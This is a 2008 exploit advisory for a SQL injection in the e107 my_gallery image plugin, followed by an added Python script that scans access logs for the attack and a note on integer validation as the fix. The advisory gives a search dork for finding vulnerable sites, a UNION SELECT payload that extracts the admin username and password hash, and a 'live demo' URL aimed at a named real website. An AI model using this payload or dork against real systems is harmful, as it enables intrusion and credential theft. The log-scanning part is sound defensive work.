
e107 Plugin my_gallery (image) Remote SQL Injection Vulnerability


####################################################
e107 Plugin my_gallery Remote SQL-injection Vulnerability
####################################################

#####################################
Author: boom3rang
Site: www.khg-crew.ws
Greetz: KHG & H!tm@N & chs & redc00de & proxy-ki11er
#####################################


- Download Plugin: http://plugins.e107.org/e107_plugins/psilo/psilo.php?artifact.130

- Dork:
inurl:image_gallery.php?page=image-detail

- POC:
http://www.site.com/e107_Path/image_g ... il&album=1&image=[exploit]

- Exploit:
-9999 UNION SELECT concat_ws(char(58),user_name,user_password)KHG from e107_user where user_id=1--

- Live demo:
http://www.ifitbleeds.net/e107_plugin ... p;album=1&image=-9999 UNION SELECT concat_ws(char(58),user_name,user_password)KHG from e107_user where user_id=1--



#########################################
- Kosova Hackers Group
- United States of Albania
- Proud to be Albanian
- Proud to be Muslim
#########################################

[2008-09-21]
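
A log check for the request pattern in the PoC above, as an added example that is not part of the original advisory: it flags requests to image_gallery.php whose `album` or `image` parameter is not a plain integer, which is what the injected value looks like in an access log. The combined log format, the `/gallery/` path and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Parameters of image_gallery.php that the PoC URL shows as numeric ids.
NUMERIC_PARAMS = ("album", "image")
# Request line of a combined-format access log entry (assumed log format).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (.+?) HTTP/[\d.]+"')

# Constructed sample log lines (documentation IP ranges, hypothetical path).
SAMPLE_LOG = [
    '192.0.2.10 - - [21/Sep/2008:10:00:01 +0000] "GET /gallery/image_gallery.php?page=image-detail&album=1&image=7 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [21/Sep/2008:10:00:09 +0000] "GET /gallery/image_gallery.php?page=image-detail&album=1&image=-9999%20UNION%20SELECT%201-- HTTP/1.1" 200 812',
    '192.0.2.10 - - [21/Sep/2008:10:00:15 +0000] "GET /index.php?image=abc HTTP/1.1" 200 300',
]

def suspicious_params(request_target):
    """Return {param: decoded value} for album/image values that are not integers."""
    parts = urlsplit(request_target)
    if not parts.path.endswith("/image_gallery.php"):
        return {}
    # parse_qs URL-decodes values, so %20 and + both become spaces.
    query = parse_qs(parts.query, keep_blank_values=True)
    bad = {}
    for name in NUMERIC_PARAMS:
        for value in query.get(name, []):
            if not re.fullmatch(r"\d+", value.strip()):
                bad[name] = value
    return bad

def scan(log_lines):
    """Yield (line_number, client_ip, findings) for each flagged log line."""
    for n, line in enumerate(log_lines, 1):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        findings = suspicious_params(m.group(1))
        if findings:
            yield n, line.split(" ", 1)[0], findings

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

The same integer-only rule is the fix on the application side: a value that must be a numeric id should be validated or cast to an integer before it reaches the query.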